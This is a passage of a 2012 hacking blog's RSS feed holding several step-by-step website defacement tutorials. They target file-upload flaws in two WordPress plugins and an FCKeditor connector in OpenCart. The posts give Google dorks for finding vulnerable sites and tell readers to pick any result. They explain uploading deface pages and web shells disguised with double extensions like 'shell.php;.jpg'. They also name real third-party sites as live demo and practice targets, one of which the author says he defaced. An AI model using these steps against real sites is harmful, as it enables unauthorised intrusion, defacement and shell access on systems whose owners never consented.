&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/chat-with-friends-through-ms-dos.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVZ8voinKwell1xCXDQWgmrdt9cD7zgeKzeipajIAHV-rMdOy_CMRatEt60tMtUWbTstzVxaPLOjEfXJzGx8i1GolYVseNYB1MAmiijDQcehir0XUQwqWRdNFm4MeTMkZis9Aql73Ac8U/s72-c/MS-DOS.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-4582585852936984923</guid><pubDate>Mon, 16 Jan 2012 11:33:00 +0000</pubDate><atom:updated>2012-01-16T17:03:35.884+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>WordPress Plugin : tdo Mini File Upload Vulnerability</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizyE7JcAbYEzKm5x61NN0z1jzMXnia2e9-YtMGyc-UJqE4PIkDMqeLjJ3rFF8gVrZAzzhErVtJ_6cEs_J5JRzYf8dZwm9NXTIXrZzkAHZ-_vdLiMiwzln7lmeAjAzn1i9hqzrIAN03PXI/s1600/wordpress_plugins.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;245&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizyE7JcAbYEzKm5x61NN0z1jzMXnia2e9-YtMGyc-UJqE4PIkDMqeLjJ3rFF8gVrZAzzhErVtJ_6cEs_J5JRzYf8dZwm9NXTIXrZzkAHZ-_vdLiMiwzln7lmeAjAzn1i9hqzrIAN03PXI/s320/wordpress_plugins.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;WordPress Plugin : tdo Mini &amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;File Upload&lt;/span&gt; Vunerablity&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i&gt;&lt;b&gt;Google Dork :&lt;/b&gt;&lt;/i&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&quot;inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&quot;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Go to &lt;b&gt;&lt;i&gt;google.com&lt;/i&gt;&lt;/b&gt; and enter this dork&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;&quot;inurl:”plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&quot;&lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/blockquote&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i&gt;Now see the results and &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD4&quot;&gt;select&lt;/span&gt; any site.......&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Now upload your deface as deface&lt;i&gt;.html;.jpg&lt;/i&gt; and upload your shell as shell&lt;i&gt;.asp;.jpg&lt;/i&gt; or &lt;i&gt;shell.php;.jpg&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and see your uploaded &lt;i&gt;&lt;b&gt;file here....&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red; font-family: Arial, Helvetica, sans-serif;&quot;&gt;www.site.com&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; line-height: 20px;&quot;&gt;/wp/wp-content/uploads/tdomf/tmp/1/Yourfilehere&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;i&gt;&lt;b&gt; &lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/wordpress-plugin-tdo-mini-file-upload.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizyE7JcAbYEzKm5x61NN0z1jzMXnia2e9-YtMGyc-UJqE4PIkDMqeLjJ3rFF8gVrZAzzhErVtJ_6cEs_J5JRzYf8dZwm9NXTIXrZzkAHZ-_vdLiMiwzln7lmeAjAzn1i9hqzrIAN03PXI/s72-c/wordpress_plugins.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-2408248636849849137</guid><pubDate>Sun, 15 Jan 2012 15:38:00 +0000</pubDate><atom:updated>2012-01-15T21:08:35.127+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>New Wordpress Exploit : 10K+ Websites vulnerable through this attack</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNxz6SrEG8a9J_ha9h849zOiEnC9CmjQXAusRsTKnDBSsJ20EDzZrv10uA6GqCkBbqyy2u0ic4CUUxKvvx7DtfdoKr_Zobw2r-PYGLpik5zzoRXOt8MINI51ZGsgLp5IbXN9ybZAfp2U/s1600/wordpressHacked.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;209&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNxz6SrEG8a9J_ha9h849zOiEnC9CmjQXAusRsTKnDBSsJ20EDzZrv10uA6GqCkBbqyy2u0ic4CUUxKvvx7DtfdoKr_Zobw2r-PYGLpik5zzoRXOt8MINI51ZGsgLp5IbXN9ybZAfp2U/s320/wordpressHacked.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;WordPress Easy Comment Upload Vulnerability:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: red;&quot;&gt;&lt;u&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Google Dork&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;:&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black; font-family: Arial,Helvetica,sans-serif;&quot;&gt;&quot;inurl:/wp-content/&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD5&quot;&gt;plugins&lt;/span&gt;/easy-comment-uploads/upload-form.php&quot;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black; font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black; font-family: Arial,Helvetica,sans-serif;&quot;&gt;/wp-content/plugins/easy-comment-uploads/upload-form.php&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black; font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: black; font-family: Arial,Helvetica,sans-serif;&quot;&gt;Index of /wp-content/plugins/easy-comment-uploads&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Open Google and enter any dork given above..&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Now selct any website&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and goto this url&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt; &lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;&lt;i&gt;site.com/wp-content/plugins/easy-comment-uploads/upload-form.php&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;You&#39;ll Get Upload Option here :)&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Now Upload Your Deface ....&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and check it here &lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;site.com/wp-content/uploads/2011/05/yourfilehere&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;i style=&quot;color: red;&quot;&gt;Note  :-&lt;/i&gt; In some websites you can Upload your deface in &lt;i&gt;.txt&lt;/i&gt; on only ... and  you can upload shell in 50% sites only ... upload shell in image format i.e. &lt;i&gt;shell.asp.jpg&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;Live Demo :-&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: blue; font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.findthepearl.com/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: blue; font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: blue; font-family: Arial, Helvetica, sans-serif;&quot;&gt;http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: red;&quot;&gt; &lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://convex-coders.blogspot.com/2012/01/new-wordpress-exploit-10k-websites.html</link><author>noreply@blogger.com (Convex Coders)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNxz6SrEG8a9J_ha9h849zOiEnC9CmjQXAusRsTKnDBSsJ20EDzZrv10uA6GqCkBbqyy2u0ic4CUUxKvvx7DtfdoKr_Zobw2r-PYGLpik5zzoRXOt8MINI51ZGsgLp5IbXN9ybZAfp2U/s72-c/wordpressHacked.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5995707516009947483.post-8136028471667799321</guid><pubDate>Fri, 13 Jan 2012 11:25:00 +0000</pubDate><atom:updated>2012-01-13T16:55:30.414+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Exploit</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">Website Hacking</category><category domain="http://www.blogger.com/atom/ns#">Wordpress Hacking</category><title>Wordpress FCKEDITOR upload Vunerablity : Upload Your Deface Remotely</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s1600/wordpress-logo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9bCdgxI-de41uJ1DiM-CWBg8QMJAyKas4UqDcpnNasWEmp8Y_2VTK1AaUBaKaGvb2JIgBrUpinlryL07OZV0s2cV-p2dgYfIfcxdRziXKDgpFhk_Z7CnI1gHJdvG50Q1RFWn8ZQnBuy8/s200/wordpress-logo.jpg&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;widget-content&quot;&gt;&lt;div class=&quot;widget-content&quot;&gt;&lt;/div&gt;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD8&quot;&gt;This Method&lt;/span&gt; also Known as &lt;i&gt;&lt;b&gt;Open &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD12&quot;&gt;Cart&lt;/span&gt;  OpenCart CMS (Web shop)  Exploit&lt;/b&gt;&lt;/i&gt;, Its a old&amp;nbsp;Vunerablity but many  pepoles don&#39;t know this ... so i&#39;m publishing here a tutorial here&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;widget-content&quot;&gt;&lt;/div&gt;&lt;div class=&quot;widget HTML&quot; id=&quot;HTML22&quot;&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;open Google.com and enter Dork:&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;inurl:admin/view/&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;javascript&lt;/span&gt;/fckeditor/editor/filemanager/&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;connectors&lt;/span&gt;/test.html&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/ul&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;or&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;inurl:Powered By OpenCart&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;You&#39;ll Got a lot of websites by google, &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD11&quot;&gt;select&lt;/span&gt; anyone ... For Example i got this one&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.schoolshopper.com.au/&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/ul&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Then i&#39;ll will simply add the vulnerability URL after the &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD10&quot;&gt;website&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Example&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.schoolshopper.com.au&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: red;&quot;&gt;/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;/span&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;(The path may be changed in other Website , Example&lt;b&gt; &lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;&gt;site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;)&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;Now a Page will be open Like This:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYnPxbsYs1w9ORjiK6xRVrO7sbARKDe2OWe8tjHGsE6dE0Pk2Wjr4Y8ILuskYhBa2I5e1FSoaXN_sPBfJU0Nfd2FWsE8VQED7nF42gKQhQL5js8Qf3Vu0FzUPb9C4JDeyS6liwJ8eMGI/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYnPxbsYs1w9ORjiK6xRVrO7sbARKDe2OWe8tjHGsE6dE0Pk2Wjr4Y8ILuskYhBa2I5e1FSoaXN_sPBfJU0Nfd2FWsE8VQED7nF42gKQhQL5js8Qf3Vu0FzUPb9C4JDeyS6liwJ8eMGI/s640/FCK1.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcK4riSiTjvRbxlEqzakbiDsvnhms0m1vMorjyuuJStFSWD3qqQSWg2Puv6fCHJspeaFj08H9yeuwygSggXU4q8JN6PYx99dsih0OYaXrXGJtIF6zxgaHAVCR-ux5zmj3vig6K6uNB5s8/s1600/FCK1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Now See The&amp;nbsp;connector option which is on top left side on page, Change The Connector into PHP (see the Image below)&lt;/span&gt;&lt;br /&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLIbTEuNqSXkFK8ny2qg_jt_uoSrQwfOJI0etyEYjqd4p1rfucRw1n8TT-h7n3Ish3QMUAZ2FK4V4fAUl1cwdsC9bNOdVtMixeyNSEalzHqmLUarMbtqjIgNXpRaz9BRkzHOVCuowFxtk/s1600/FCK2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;182&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLIbTEuNqSXkFK8ny2qg_jt_uoSrQwfOJI0etyEYjqd4p1rfucRw1n8TT-h7n3Ish3QMUAZ2FK4V4fAUl1cwdsC9bNOdVtMixeyNSEalzHqmLUarMbtqjIgNXpRaz9BRkzHOVCuowFxtk/s400/FCK2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and Now see file upload option and upload your deface or shell&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;and for checking shell or deface check this url&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;www.site.com/deface.html&lt;/span&gt;&lt;/li&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;
&lt;li&gt;or&lt;/li&gt;
&lt;li&gt;www.site.com/shell.php&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;I have uploaded xd.html here so you can check&amp;nbsp;&lt;a href=&quot;http://www.schoolshopper.com.au/xd.html&quot;&gt;http://www.schoolshopper.com.au/xd.html&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;u&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;i&gt;&lt;b&gt;FOR PRACTICE..&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial,Helvetica,sans-serif; font-size: xx-small;&quot;&gt;http://ruthsgarden.com/jaihind.html&lt;/span&gt;&lt;/li&gt;
